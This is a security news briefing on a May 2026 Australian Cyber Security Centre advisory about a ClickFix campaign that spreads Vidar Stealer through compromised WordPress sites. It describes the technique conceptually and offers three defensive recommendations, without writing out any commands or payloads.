What happened
The Australian Signals Directorate’s Australian Cyber Security Centre issued an advisory on May 7, 2026, warning organizations of an active campaign using the ClickFix social engineering technique to distribute Vidar Stealer malware through compromised WordPress websites. The ACSC confirmed the activity has been targeting Australian infrastructure and organizations across multiple sectors since early 2026.
ClickFix is a social engineering technique that tricks users into manually executing malicious PowerShell commands by presenting fake CAPTCHA or Cloudflare verification prompts on compromised websites. Because the user enters the command themselves, the technique bypasses many automated security controls that would otherwise block malware delivery. In this campaign, compromised WordPress sites redirect visitors to pages displaying fake verification prompts that copy a malicious PowerShell command to the clipboard and instruct the user to paste and run it, resulting in a Vidar Stealer infection.
Vidar Stealer is a malware-as-a-service infostealer active since 2018 that targets browser passwords, cookies, cryptocurrency wallets, autofill data, MFA tokens, and system details. It employs defense evasion techniques including self-deletion of its initial executable, operating primarily in memory after execution to reduce forensic artifacts. The malware retrieves command-and-control addresses through dead-drop mechanisms on public services including Telegram bots and Steam profiles. Browser session cookies captured by Vidar can allow attackers to bypass both passwords and active MFA sessions.
Who is affected
Australian organizations and infrastructure operators across multiple sectors are the confirmed targets of this specific campaign. The ClickFix technique itself is not geographically limited, and similar campaigns have been documented globally. Organizations running WordPress-based websites are also indirectly affected as potential delivery infrastructure for the attacks.
Why CISOs should care
ClickFix’s effectiveness comes from removing the malware from the delivery chain entirely. There is no malicious attachment, no drive-by download, and no exploit to detect. The user is the delivery mechanism. That makes this technique particularly resistant to traditional email security controls, endpoint detection of downloaded files, and network-based malware filtering, because the payload arrives only after the user has been socially engineered into executing a command that security tools perceive as user-initiated activity.
The combination of Vidar’s MFA bypass capability through stolen session cookies and its memory-resident operation after execution makes detection and containment after initial infection significantly harder than with more conventional malware families.
3 practical actions
- Restrict PowerShell execution to authorized users and scripts through application control policies: ClickFix depends on users being able to execute arbitrary PowerShell commands. Group Policy or endpoint protection policies that restrict PowerShell execution to signed scripts or specific authorized users directly interrupt the attack chain before the payload can be delivered.
- Audit and harden WordPress websites operated by your organization: Compromised WordPress sites are both the delivery infrastructure and a reputational risk for affected organizations. Review plugin and theme currency, enforce strong administrative credentials, and implement file integrity monitoring to detect unauthorized modifications that may indicate compromise for use in ClickFix campaigns.
- Train employees to recognize fake CAPTCHA and browser verification prompts requesting command execution: The social engineering element is the attack’s only delivery path. Security awareness training should explicitly cover the scenario of being asked to copy and paste a command into PowerShell or the Run dialog as part of a verification or troubleshooting step, treating any such prompt as a high-confidence indicator of a ClickFix attack.
Also in the news today:
- Fake Claude AI Website Delivers New Beagle Windows Backdoor via Malvertising
- NVIDIA Confirms GeForce NOW Data Breach Affecting Armenian Regional Partner
- Zara Data Breach Exposed Personal Information of 197,000 People
- Ivanti Warns of New EPMM Flaw Exploited in Zero-Day Attacks
- Polish Intelligence Warns Hackers Attacked Water Treatment Control Systems
- New TCLBanker Malware Self-Spreads Over WhatsApp and Outlook
